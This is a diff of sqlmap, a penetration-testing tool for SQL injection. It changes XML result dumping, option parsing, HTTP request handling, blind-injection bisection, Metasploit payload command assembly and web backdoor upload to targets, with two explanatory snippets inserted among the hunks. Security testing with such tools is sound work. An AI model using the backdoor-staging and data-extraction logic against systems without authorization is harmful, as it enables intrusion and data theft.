printDbs[db][tbl][col] = dataType
else:
printDbs[db][tbl] = {col: dataType}
else:
printDbs[db] = {}
printDbs[db][tbl] = {col: dataType}
continue
self.dbTableColumns(printDbs)
def query(self, query, queryRes):
'''
Adds details of an executed query to the xml.
The query details are the query itself and its results.
'''
queryElem = self.__doc.createElement(QUERY_ELEM_NAME)
queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query))
queryElem.appendChild(self._createTextNode(queryRes))
queriesElem = self._getRootChild(QUERIES_ELEM_NAME)
if (not(queriesElem)):
queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME)
self._addToRoot(queriesElem)
queriesElem.appendChild(queryElem)
def registerValue(self, registerData):
'''
Adds information about an extracted registry key to the xml
'''
registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME)
registerElem.appendChild(self._createTextNode(registerData))
registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME)
if (not(registriesElem)):
registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME)
self._addToRoot(registriesElem)
registriesElem.appendChild(registerElem)
def rFile(self, filePath, data):
'''
Adds an extracted file's content to the xml
'''
fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME)
fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath))
fileContentElem.appendChild(self._createTextNode(data))
self._addToRoot(fileContentElem)
def setOutputFile(self):
'''
Initializes the XML output file from the configuration.
'''
if (conf.xmlFile):
try:
self._outputFile = conf.xmlFile
self.__root = None
if os.path.exists(self._outputFile):
try:
self.__doc = xml.dom.minidom.parse(self._outputFile)
self.__root = self.__doc.childNodes[0]
except ExpatError:
self.__doc = Document()
self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING)
if self.__root is None:
self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME)
self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR))
self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME))
self.__doc.appendChild(self.__root)
except IOError:
raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile)
def getOutputFile(self):
return self._outputFile
def finish(self, resultStatus, resultMsg=""):
'''
Finishes the dumper operation:
1. Adds the session status to the xml
2. Writes the xml to the file
3. Closes the xml file
'''
if ((self._outputFP is not None) and not(self._outputFP.closed)):
statusElem = self.__doc.createElement(STATUS_ELEM_NAME)
statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus)))
if not resultStatus:
errorElem = self.__doc.createElement(ERROR_ELEM_NAME)
if isinstance(resultMsg, Exception):
errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__))
else:
errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE))
errorElem.appendChild(self._createTextNode(getUnicode(resultMsg)))
statusElem.appendChild(errorElem)
self._addToRoot(statusElem)
self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING))
self._outputFP.close()
def closeDumper(status, msg=""):
"""
Closes the dumper of the session
"""
if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"):
conf.dumper.finish(status, msg)
dumper = XMLDump()
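A brief orientation note, not part of the diff: judging by the code above, the module-level dumper is meant to be driven roughly as follows once sqlmap's conf object has been initialized elsewhere (the path and values below are hypothetical):

from lib.core.data import conf
from lib.core.xmldump import dumper as xmldumper

conf.xmlFile = "/tmp/results.xml"        # hypothetical output path
xmldumper.setOutputFile()                # creates or re-parses the XML document
xmldumper.banner("MySQL 5.7.12")         # adds a <Banner> element
xmldumper.currentUser("root@localhost")  # adds a <CurrentUser> element
xmldumper.finish(True)                   # appends <Status success="True"/> and writes the file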

View File

@@ -759,9 +759,6 @@ def cmdLineParser(argv=None):
parser.add_option("--dummy", dest="dummy", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--murphy-rate", dest="murphyRate", type="int",
help=SUPPRESS_HELP)
parser.add_option("--pickled-options", dest="pickledOptions",
help=SUPPRESS_HELP)
@@ -885,6 +882,7 @@ def cmdLineParser(argv=None):
except ValueError, ex:
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
# Hide non-basic options in basic help case
for i in xrange(len(argv)):
if argv[i] == "-hh":
argv[i] = "-h"
@@ -912,14 +910,6 @@ def cmdLineParser(argv=None):
if not found:
parser.option_groups.remove(group)
for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)):
try:
if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit():
conf.verbose = verbosity.count('v') + 1
del argv[argv.index(verbosity)]
except (IndexError, ValueError):
pass
try:
(args, _) = parser.parse_args(argv)
except UnicodeEncodeError, ex:
@@ -948,7 +938,7 @@ def cmdLineParser(argv=None):
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
errMsg += "use -h for basic or -hh for advanced help\n"
errMsg += "use -h for basic or -hh for advanced help"
parser.error(errMsg)
return args

View File

@@ -59,13 +59,6 @@ def htmlParser(page):
xmlfile = paths.ERRORS_XML
handler = HTMLHandler(page)
key = hash(page)
if key in kb.cache.parsedDbms:
retVal = kb.cache.parsedDbms[key]
if retVal:
handler._markAsErrorPage()
return retVal
parseXmlFile(xmlfile, handler)
@@ -75,8 +68,6 @@ def htmlParser(page):
else:
kb.lastParserStatus = None
kb.cache.parsedDbms[key] = handler.dbms
# generic SQL warning/error messages
if re.search(r"SQL (warning|error|syntax)", page, re.I):
handler._markAsErrorPage()

View File

@@ -26,7 +26,6 @@ from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.decorators import cachedmethod
from lib.core.enums import DBMS
from lib.core.enums import HTTP_HEADER
from lib.core.enums import PLACE
@@ -137,7 +136,6 @@ def parseResponse(page, headers):
if page:
htmlParser(page)
@cachedmethod
def checkCharEncoding(encoding, warn=True):
"""
Checks encoding name, repairs common misspellings and adjusts to
@@ -232,10 +230,7 @@ def getHeuristicCharEncoding(page):
Returns page encoding charset detected by usage of heuristics
Reference: http://chardet.feedparser.org/docs/
"""
key = hash(page)
retVal = kb.cache.encoding.get(key) or detect(page)["encoding"]
kb.cache.encoding[key] = retVal
retVal = detect(page)["encoding"]
if retVal:
infoMsg = "heuristics detected web page charset '%s'" % retVal
@@ -341,8 +336,6 @@ def processResponse(page, responseHeaders):
if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):
kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)
else:
kb.tableFrom = None
if conf.parseErrors:
msg = extractErrorMessage(page)
@@ -358,11 +351,7 @@ def processResponse(page, responseHeaders):
if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]:
if conf.paramDict[PLACE.POST][name] in page:
continue
else:
msg = "do you want to automatically adjust the value of '%s'? [y/N]" % name
if readInput(msg, default='N').strip().upper() != 'Y':
continue
conf.paramDict[PLACE.POST][name] = value
conf.paramDict[PLACE.POST][name] = value
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""):

View File

@@ -26,7 +26,6 @@ from lib.core.settings import MAX_RATIO
from lib.core.settings import REFLECTED_VALUE_MARKER
from lib.core.settings import LOWER_RATIO_BOUND
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.settings import URI_HTTP_HEADER
from lib.core.threads import getCurrentThreadData
def comparison(page, headers, code=None, getRatioValue=False, pageLength=None):
@@ -49,15 +48,18 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
threadData = getCurrentThreadData()
if kb.testMode:
threadData.lastComparisonHeaders = listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else ""
threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else ""
threadData.lastComparisonPage = page
threadData.lastComparisonCode = code
if page is None and pageLength is None:
return None
seqMatcher = threadData.seqMatcher
seqMatcher.set_seq1(kb.pageTemplate)
if any((conf.string, conf.notString, conf.regexp)):
rawResponse = "%s%s" % (listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "", page)
rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page)
# String to match in page when the query is True and/or valid
if conf.string:
@@ -75,9 +77,6 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
if conf.code:
return conf.code == code
seqMatcher = threadData.seqMatcher
seqMatcher.set_seq1(kb.pageTemplate)
if page:
# In case of an DBMS error page return None
if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic:

View File

@@ -90,7 +90,6 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
from lib.core.settings import MAX_CONNECTIONS_REGEX
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
from lib.core.settings import MAX_MURPHY_SLEEP_TIME
from lib.core.settings import META_REFRESH_REGEX
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import IS_WIN
@@ -111,6 +110,7 @@ from lib.request.basic import processResponse
from lib.request.direct import direct
from lib.request.comparison import comparison
from lib.request.methodrequest import MethodRequest
from thirdparty.multipart import multipartpost
from thirdparty.odict.odict import OrderedDict
from thirdparty.socks.socks import ProxyError
@@ -225,10 +225,8 @@ class Connect(object):
if conf.offline:
return None, None, None
elif conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0:
if conf.murphyRate:
time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1))
return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None if not conf.murphyRate else randomInt(3)
elif conf.dummy:
return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None
threadData = getCurrentThreadData()
with kb.locks.request:
@@ -244,7 +242,7 @@ class Connect(object):
referer = kwargs.get("referer", None) or conf.referer
host = kwargs.get("host", None) or conf.host
direct_ = kwargs.get("direct", False)
multipart = kwargs.get("multipart", None)
multipart = kwargs.get("multipart", False)
silent = kwargs.get("silent", False)
raise404 = kwargs.get("raise404", True)
timeout = kwargs.get("timeout", None) or conf.timeout
@@ -256,9 +254,6 @@ class Connect(object):
crawling = kwargs.get("crawling", False)
skipRead = kwargs.get("skipRead", False)
if multipart:
post = multipart
websocket_ = url.lower().startswith("ws")
if not urlparse.urlsplit(url).netloc:
@@ -303,6 +298,20 @@ class Connect(object):
params = urlencode(params)
url = "%s?%s" % (url, params)
elif multipart:
# Needed in this form because of potential circular dependency
# problem (option -> update -> connect -> option)
from lib.core.option import proxyHandler
multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
conn = multipartOpener.open(unicodeencode(url), multipart)
page = Connect._connReadProxy(conn) if not skipRead else None
responseHeaders = conn.info()
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
return page
elif any((refreshing, crawling)):
pass
@@ -355,7 +364,7 @@ class Connect(object):
if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
@@ -406,7 +415,7 @@ class Connect(object):
responseHeaders = _(ws.getheaders())
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
requestMsg += "\n%s" % requestHeaders
if post is not None:
@@ -425,7 +434,7 @@ class Connect(object):
else:
req = urllib2.Request(url, post, headers)
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
conf.cj._policy._now = conf.cj._now = int(time.time())
@@ -446,10 +455,9 @@ class Connect(object):
requestMsg += "\n"
if not multipart:
threadData.lastRequestMsg = requestMsg
threadData.lastRequestMsg = requestMsg
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
if conf.cj:
for cookie in conf.cj:
@@ -559,7 +567,7 @@ class Connect(object):
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
@@ -570,8 +578,7 @@ class Connect(object):
elif conf.verbose > 5:
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
if not multipart:
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
errMsg = "not authorized, try to provide right HTTP "
@@ -694,7 +701,7 @@ class Connect(object):
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
if not skipLogTraffic:
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
@@ -704,8 +711,7 @@ class Connect(object):
elif conf.verbose > 5:
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
if not multipart:
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
return page, responseHeaders, code
@@ -1076,7 +1082,7 @@ class Connect(object):
dataToStdout(" (done)\n")
elif not kb.testMode:
warnMsg = "it is very important to not stress the network connection "
warnMsg = "it is very important to not stress the network adapter "
warnMsg += "during usage of time-based payloads to prevent potential "
warnMsg += "disruptions "
singleTimeWarnMessage(warnMsg)
@@ -1143,7 +1149,6 @@ class Connect(object):
threadData.lastQueryDuration = calculateDeltaSeconds(start)
threadData.lastPage = page
threadData.lastCode = code
kb.originalCode = kb.originalCode or code

View File

@@ -87,9 +87,8 @@ class HTTPSConnection(httplib.HTTPSConnection):
if not success:
errMsg = "can't establish SSL connection"
# Reference: https://docs.python.org/2/library/ssl.html
if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.9"):
errMsg += " (please retry with Python >= 2.7.9)"
if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.10"):
errMsg += " (please retry with Python >= 2.7.10)"
raise SqlmapConnectionException(errMsg)
class HTTPSHandler(urllib2.HTTPSHandler):

View File

@@ -429,12 +429,10 @@ class Metasploit:
self._payloadCmd += " X > \"%s\"" % outFile
else:
if extra == "BufferRegister=EAX":
self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format)
self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
if extra is not None:
self._payloadCmd += " %s" % extra
self._payloadCmd += " > \"%s\"" % outFile
else:
self._payloadCmd += " -f exe > \"%s\"" % outFile

View File

@@ -116,7 +116,7 @@ class Web:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the file through the web file "
@@ -200,15 +200,6 @@ class Web:
directories.extend(getAutoDirectories())
directories = list(oset(directories))
path = urlparse.urlparse(conf.url).path or '/'
if path != '/':
_ = []
for directory in directories:
_.append(directory)
if not directory.endswith(path):
_.append("%s/%s" % (directory.rstrip('/'), path.strip('/')))
directories = _
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))

View File

@@ -41,7 +41,7 @@ from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MAX_BISECTION_LENGTH
from lib.core.settings import MAX_REVALIDATION_STEPS
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
from lib.core.settings import NULL
from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
from lib.core.settings import PARTIAL_VALUE_MARKER
@@ -66,7 +66,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
finalValue = None
retrievedLength = 0
asciiTbl = getCharset(charsetType)
threadData = getCurrentThreadData()
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
retVal = hashDBRetrieve(expression, checkConf=True)
@@ -144,7 +143,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
length = None
showEta = conf.eta and isinstance(length, int)
numThreads = min(conf.threads, length) or 1
numThreads = min(conf.threads, length)
if showEta:
progress = ProgressBar(maxValue=length)
@@ -198,7 +197,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
def validateChar(idx, value):
"""
Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay
Used in time-based inference (in case that original and retrieved
value are not equal there will be a deliberate delay).
"""
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
@@ -209,17 +209,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value))
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
if result and timeBasedCompare:
result = threadData.lastCode == kb.injection.data[kb.technique].trueCode
if not result:
warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode)
singleTimeWarnMessage(warnMsg)
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
return result
return not result
def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None):
"""
@@ -261,44 +254,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
maxChar = maxValue = charTbl[-1]
minChar = minValue = charTbl[0]
firstCheck = False
lastCheck = False
unexpectedCode = False
while len(charTbl) != 1:
position = None
if charsetType is None:
if not firstCheck:
try:
try:
lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]
except IndexError:
lastChar = None
if 'a' <= lastChar <= 'z':
position = charTbl.index(ord('a') - 1) # 96
elif 'A' <= lastChar <= 'Z':
position = charTbl.index(ord('A') - 1) # 64
elif '0' <= lastChar <= '9':
position = charTbl.index(ord('0') - 1) # 47
except ValueError:
pass
finally:
firstCheck = True
elif not lastCheck and numThreads == 1: # not usable in multi-threading environment
if charTbl[(len(charTbl) >> 1)] < ord(' '):
try:
# favorize last char check if current value inclines toward 0
position = charTbl.index(1)
except ValueError:
pass
finally:
lastCheck = True
if position is None:
position = (len(charTbl) >> 1)
position = (len(charTbl) >> 1)
posValue = charTbl[position]
falsePayload = None
@@ -321,12 +279,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
if not timeBasedCompare:
unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode)
if unexpectedCode:
warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode
singleTimeWarnMessage(warnMsg)
if result:
minValue = posValue
@@ -366,25 +318,24 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
retVal = minValue + 1
if retVal in originalTbl or (retVal == ord('\n') and CHAR_INFERENCE_MARK in payload):
if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal):
if timeBasedCompare and not validateChar(idx, retVal):
if not kb.originalTimeDelay:
kb.originalTimeDelay = conf.timeSec
threadData.validationRun = 0
if retried < MAX_REVALIDATION_STEPS:
kb.timeValidCharsRun = 0
if retried < MAX_TIME_REVALIDATION_STEPS:
errMsg = "invalid character detected. retrying.."
logger.error(errMsg)
if timeBasedCompare:
if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
conf.timeSec += 1
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
logger.warn(warnMsg)
if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
conf.timeSec += 1
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
logger.warn(warnMsg)
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
dbgMsg = "turning off time auto-adjustment mechanism"
logger.debug(dbgMsg)
kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
dbgMsg = "turning off time auto-adjustment mechanism"
logger.debug(dbgMsg)
kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO
return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1)
else:
@@ -394,8 +345,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
return decodeIntToUnicode(retVal)
else:
if timeBasedCompare:
threadData.validationRun += 1
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD:
kb.timeValidCharsRun += 1
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and kb.timeValidCharsRun > VALID_TIME_CHARS_RUN_THRESHOLD:
dbgMsg = "turning back on time auto-adjustment mechanism"
logger.debug(dbgMsg)
kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES
@@ -425,6 +376,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Go multi-threading (--threads > 1)
if conf.threads > 1 and isinstance(length, int) and length > 1:
threadData = getCurrentThreadData()
threadData.shared.value = [None] * length
threadData.shared.index = [firstChar] # As list for python nested function scoping
threadData.shared.start = firstChar
@@ -523,7 +476,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# No multi-threading (--threads = 1)
else:
index = firstChar
threadData.shared.value = ""
while True:
index += 1
@@ -599,7 +551,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if kb.data.processChar:
val = kb.data.processChar(val)
threadData.shared.value = partialValue = partialValue + val
partialValue += val
if showEta:
progress.progress(time.time() - charStart, index)
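For readers less familiar with the routine being patched here, a self-contained sketch of the underlying bisection idea: a binary search over a character table driven by a boolean oracle. This illustrates the general technique only, not sqlmap's exact implementation:

def bisect_char(oracle, char_table):
    # oracle(value) returns True when the character being inferred is
    # strictly greater than value (e.g. the answer of a boolean-based query)
    low, high = 0, len(char_table) - 1
    while low < high:
        mid = (low + high) >> 1
        if oracle(char_table[mid]):
            low = mid + 1
        else:
            high = mid
    return char_table[low]

# Plain Python oracle standing in for the injected comparison
secret = ord('s')
print(chr(bisect_char(lambda value: secret > value, range(32, 127))))   # 's'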

View File

@@ -224,7 +224,7 @@ class StdDbOut(object):
# Ignore all non-relevant messages
return
output = conf.databaseCursor.execute(
output = conf.database_cursor.execute(
"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?",
(self.taskid, content_type))
@@ -232,25 +232,25 @@ class StdDbOut(object):
if status == CONTENT_STATUS.COMPLETE:
if len(output) > 0:
for index in xrange(len(output)):
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?",
conf.database_cursor.execute("DELETE FROM data WHERE id = ?",
(output[index][0],))
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
(self.taskid, status, content_type, jsonize(value)))
if kb.partRun:
kb.partRun = None
elif status == CONTENT_STATUS.IN_PROGRESS:
if len(output) == 0:
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
(self.taskid, status, content_type,
jsonize(value)))
else:
new_value = "%s%s" % (dejsonize(output[0][2]), value)
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?",
conf.database_cursor.execute("UPDATE data SET value = ? WHERE id = ?",
(jsonize(new_value), output[0][0]))
else:
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
(self.taskid, str(value) if value else ""))
def flush(self):
@@ -269,7 +269,7 @@ class LogRecorder(logging.StreamHandler):
Record emitted events to IPC database for asynchronous I/O
communication with the parent process
"""
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
(conf.taskid, time.strftime("%X"), record.levelname,
record.msg % record.args if record.args else record.msg))
@@ -277,8 +277,8 @@ class LogRecorder(logging.StreamHandler):
def setRestAPILog():
if hasattr(conf, "api"):
try:
conf.databaseCursor = Database(conf.database)
conf.databaseCursor.connect("client")
conf.database_cursor = Database(conf.database)
conf.database_cursor.connect("client")
except sqlite3.OperationalError, ex:
raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database)
@@ -722,8 +722,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
while True:
try:
command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip()
command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command)
command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower()
except (EOFError, KeyboardInterrupt):
print
break

View File

@@ -44,8 +44,6 @@ def checkDependencies():
elif dbmsName == DBMS.HSQLDB:
import jaydebeapi
import jpype
elif dbmsName == DBMS.INFORMIX:
import ibm_db_dbi
except ImportError:
warnMsg = "sqlmap requires '%s' third-party library " % data[1]
warnMsg += "in order to directly connect to the DBMS "

View File

@@ -85,9 +85,3 @@ class xrange(object):
def _index(self, i):
return self.start + self.step * i
def index(self, i):
if self.start <= i < self.stop:
return i - self.start
else:
raise ValueError("%d is not in list" % i)

View File

@@ -1,34 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import DBMS
from lib.core.settings import INFORMIX_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.informix.enumeration import Enumeration
from plugins.dbms.informix.filesystem import Filesystem
from plugins.dbms.informix.fingerprint import Fingerprint
from plugins.dbms.informix.syntax import Syntax
from plugins.dbms.informix.takeover import Takeover
from plugins.generic.misc import Miscellaneous
class InformixMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
"""
This class defines Informix methods
"""
def __init__(self):
self.excludeDbsList = INFORMIX_SYSTEM_DBS
Syntax.__init__(self)
Fingerprint.__init__(self)
Enumeration.__init__(self)
Filesystem.__init__(self)
Miscellaneous.__init__(self)
Takeover.__init__(self)
unescaper[DBMS.INFORMIX] = Syntax.escape

View File

@@ -1,63 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
try:
import ibm_db_dbi
except ImportError:
pass
import logging
